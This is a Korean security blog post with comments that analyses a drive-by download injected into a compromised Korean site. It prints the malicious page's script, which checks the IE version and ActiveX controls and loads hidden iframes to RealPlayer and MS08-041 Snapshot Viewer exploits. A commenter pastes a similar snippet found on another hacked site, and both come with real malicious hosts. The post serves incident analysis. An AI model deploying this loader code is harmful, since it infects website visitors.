데이터넷에 접속하면 http://203.248.195.23/korea.htm 으로 리다렉션 되는듯 합니다.

korea.htm의 내용을 보면 아래와 같습니다.


<html>
<script>
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=100 height=0 src=yt14.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytfl.htm></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0)
document.write("<iframe src=ytxxz.htm width=100 height=0></iframe>");
try{var b;
var of=new ActiveXObject("snpvw.Snap"+"shot Viewer Control.1");}
catch(b){};
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=ytff.htm></iframe>");}}
function YuTian222()
{
YuTian = "IERPCtl.IER"+"PCtl.1";
try
{
YiTn = new ActiveXObject(YuTian);
}catch(error){return;}
Tellm = YiTn.PlayerProperty("PRODUCTVE"+"RSION");
if(Tellm<="6.0.14.552")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=yt122121.htm></iframe>");
}
YuTian222();
</script>
</html>

로컬로 접속하면 찝찝하여 백트랙으로 wget으로 긁어 왔습니다.. ㅋㅋㅋ

간단하게 보면 IE버전에 따라 다른htm 파일을 받는군요.

지금 잠깐 강의 시간에 올리는건데 빨리 분석해보고 싶군요.

SIS 카페에서 최초로 신고된듯 합니다.

신고해주신분께 정말 감사.. ㅠㅠ

벌써 몇분이 분석을 하신듯 한데 그분들의 말씀으로는 버전에 따라 다른 htm에서 js 파일을 받는다고 하더군요.

취약성은  Realplayer ActiveX 취약성과 MS08-041 MS Access Snapshot Viewer ActiveX 취약성 이라고 합니다.

취약성은 안다고 해도... 한번쯤 분석해보는게 좋을 듯 싶으니 모두 분석해봅시다 !! ㅋ
  1. Favicon of https://jok3.tistory.com BlogIcon Jok3 2009.03.25 00:09 신고

    몇일전에 대화명의 그것인가보군요...ㅎㅎ

    • Favicon of https://maj3sty.tistory.com BlogIcon MaJ3stY 2009.03.25 00:12 신고

      네 ㅎㅎ;;

      분석을 하려했으나... 해당 사이트 측에서 웹나이트 설치로 페이지가 날라가버린 ㅠㅠ vm에서 백트랙 돌려 받은 터라 백트랙 종료하는 순간 파일도 날라가버렸는데.. ㅠㅠ

  2. Favicon of http://blog.naver.com/yuriblack BlogIcon yuriblack 2009.05.08 09:41

    아.. 나왔다. ㅋㅋ 제가 지금 인턴으로 있는 회사 홈페이지에서 공지게시판에 글쓰기를 누르면 페이지가 느려지거나 익스플로러 응답없음이 되더라구요.. 그리고 왼쪽 아래에 http://wr.jkt57.cn/1/20/hk122121.htm 란 주소가 나오던...
    cn이면 짱껜데 ㄱ-;;;;;; 그 주소로 들어가서 소스보기 하니까

    <SCRIPT>window.onerror=function(){return true;}</SCRIPT>
    <SCRIPT>
    document.writeln("<object classid=\"clsid:CFCDAA03-8B"+"E4-11CF-B84B-0020AFBBCCFA\" style=\'display:none\' id=\'YuTian\'><\/object>";);
    </SCRIPT>
    <script src="Turl.css"></script>
    <script src="real.css"></script>
    <script src="real1.css"></script>

    가 있던데..YuTian으로 검색해서 왔어요 ㅋ 혹시 이것에 대한 해결방법 있나요?
    스크립트는 걍 긁어서 쪼금식 수정하면서 쓸줄만 알지 해킹 같은거 등등 자세히는 잘 몰라서ㅠㅜ (전공도 아니다보니;;)

    • Favicon of https://maj3sty.tistory.com BlogIcon MaJ3stY 2009.05.09 23:01 신고

      회사 전산실이나 보안팀이 있으시면 그쪽으로 연락하시는게 제일 빠른 처리방법일거에요.

      css파일을 받아서 분석해봐야 할 것 같습니다

+ Recent posts